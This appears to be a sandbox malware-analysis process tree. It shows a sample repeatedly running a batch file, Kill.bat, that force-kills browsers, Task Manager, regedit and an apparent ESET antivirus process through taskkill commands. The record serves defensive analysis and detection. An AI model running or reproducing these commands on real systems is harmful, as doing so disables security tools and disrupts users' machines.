      • cmd.exe (PID: 2748 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\BUG32\Kill.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 2704 cmdline: taskkill /f /im chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 5372 cmdline: taskkill /f /im opera.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 2624 cmdline: taskkill /f /im iexplore.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 2804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • conhost.exe (PID: 2612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 5036 cmdline: taskkill /f /im msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 6968 cmdline: taskkill /f /im microsoftedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 3344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 1360 cmdline: taskkill /f /im notepad.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 3436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 5524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • conhost.exe (PID: 4436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • conhost.exe (PID: 4804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7596 cmdline: taskkill /f /im firefox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 5016 cmdline: taskkill /f /im mspaint.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 2272 cmdline: taskkill /f /im skype.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 980 cmdline: taskkill /f /im bing.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 1628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 6984 cmdline: taskkill /f /im eset.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 4292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 5256 cmdline: taskkill /f /im edge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 5444 cmdline: taskkill /f /im taskmgr.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 4616 cmdline: taskkill /f /im regedit.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7952 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\BUG32\Kill.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 4476 cmdline: taskkill /f /im chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 3592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 3772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 5692 cmdline: taskkill /f /im opera.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7480 cmdline: taskkill /f /im iexplore.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 3856 cmdline: taskkill /f /im msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 8184 cmdline: taskkill /f /im microsoftedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 2140 cmdline: taskkill /f /im notepad.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7056 cmdline: taskkill /f /im firefox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 4288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 4256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 2436 cmdline: taskkill /f /im mspaint.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 1164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 3440 cmdline: taskkill /f /im skype.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 5540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7400 cmdline: taskkill /f /im bing.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7528 cmdline: taskkill /f /im eset.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 1568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 3276 cmdline: taskkill /f /im edge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 5884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 1988 cmdline: taskkill /f /im taskmgr.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 4724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 5504 cmdline: taskkill /f /im regedit.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • conhost.exe (PID: 5716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 5080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 6064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3176 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\BUG32\Kill.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 320 cmdline: taskkill /f /im chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 6804 cmdline: taskkill /f /im opera.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7600 cmdline: taskkill /f /im iexplore.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7988 cmdline: taskkill /f /im msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 1128 cmdline: taskkill /f /im microsoftedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 3616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 1356 cmdline: taskkill /f /im notepad.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 2232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 2472 cmdline: taskkill /f /im firefox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 5856 cmdline: taskkill /f /im mspaint.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 5744 cmdline: taskkill /f /im skype.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 5284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 3500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 4612 cmdline: taskkill /f /im bing.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 5588 cmdline: taskkill /f /im eset.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 4260 cmdline: taskkill /f /im edge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 6112 cmdline: taskkill /f /im taskmgr.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 4424 cmdline: taskkill /f /im regedit.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • cmd.exe (PID: 2764 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\BUG32\Kill.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 1200 cmdline: taskkill /f /im chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 5412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 6568 cmdline: taskkill /f /im opera.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 4280 cmdline: taskkill /f /im iexplore.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7536 cmdline: taskkill /f /im msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7064 cmdline: taskkill /f /im microsoftedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 5292 cmdline: taskkill /f /im notepad.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 3144 cmdline: taskkill /f /im firefox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 1896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 3808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7196 cmdline: taskkill /f /im mspaint.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 4164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7988 cmdline: taskkill /f /im skype.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 1080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 3808 cmdline: taskkill /f /im bing.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 1516 cmdline: taskkill /f /im eset.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 3148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 3616 cmdline: taskkill /f /im edge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 4120 cmdline: taskkill /f /im taskmgr.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 2788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 5256 cmdline: taskkill /f /im regedit.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5552 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\BUG32\Kill.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 3852 cmdline: taskkill /f /im chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 2352 cmdline: taskkill /f /im opera.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7292 cmdline: taskkill /f /im iexplore.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 5708 cmdline: taskkill /f /im msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 5784 cmdline: taskkill /f /im microsoftedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 5292 cmdline: taskkill /f /im notepad.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 4724 cmdline: taskkill /f /im firefox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 5532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 6812 cmdline: taskkill /f /im mspaint.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 1628 cmdline: taskkill /f /im skype.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 1888 cmdline: taskkill /f /im bing.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 528 cmdline: taskkill /f /im eset.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 5372 cmdline: taskkill /f /im edge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 2964 cmdline: taskkill /f /im taskmgr.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 4740 cmdline: taskkill /f /im regedit.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • cmd.exe (PID: 5356 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\BUG32\Kill.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 6512 cmdline: taskkill /f /im chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 6504 cmdline: taskkill /f /im opera.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 2848 cmdline: taskkill /f /im iexplore.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 5372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 5588 cmdline: taskkill /f /im msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7148 cmdline: taskkill /f /im microsoftedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 1124 cmdline: taskkill /f /im notepad.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 4500 cmdline: taskkill /f /im firefox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 5748 cmdline: taskkill /f /im mspaint.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7632 cmdline: taskkill /f /im skype.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7840 cmdline: taskkill /f /im bing.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 1216 cmdline: taskkill /f /im eset.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7676 cmdline: taskkill /f /im edge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 4444 cmdline: taskkill /f /im taskmgr.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 2352 cmdline: taskkill /f /im regedit.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5040 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\BUG32\Kill.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 6512 cmdline: taskkill /f /im chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 2664 cmdline: taskkill /f /im opera.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7120 cmdline: taskkill /f /im iexplore.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 6084 cmdline: taskkill /f /im msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 5692 cmdline: taskkill /f /im microsoftedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 1268 cmdline: taskkill /f /im notepad.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 3852 cmdline: taskkill /f /im firefox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 6576 cmdline: taskkill /f /im mspaint.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 4228 cmdline: taskkill /f /im skype.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 2412 cmdline: taskkill /f /im bing.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 1200 cmdline: taskkill /f /im eset.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 6148 cmdline: taskkill /f /im edge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 6352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 6168 cmdline: taskkill /f /im taskmgr.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 4844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 8108 cmdline: taskkill /f /im regedit.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • cmd.exe (PID: 2216 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\BUG32\Kill.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 3808 cmdline: taskkill /f /im chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 1852 cmdline: taskkill /f /im opera.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 744 cmdline: taskkill /f /im iexplore.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 2284 cmdline: taskkill /f /im msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 5792 cmdline: taskkill /f /im microsoftedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 4684 cmdline: taskkill /f /im notepad.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 4352 cmdline: taskkill /f /im firefox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 768 cmdline: taskkill /f /im mspaint.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7340 cmdline: taskkill /f /im skype.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 5484 cmdline: taskkill /f /im bing.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 3228 cmdline: taskkill /f /im eset.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7040 cmdline: taskkill /f /im edge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
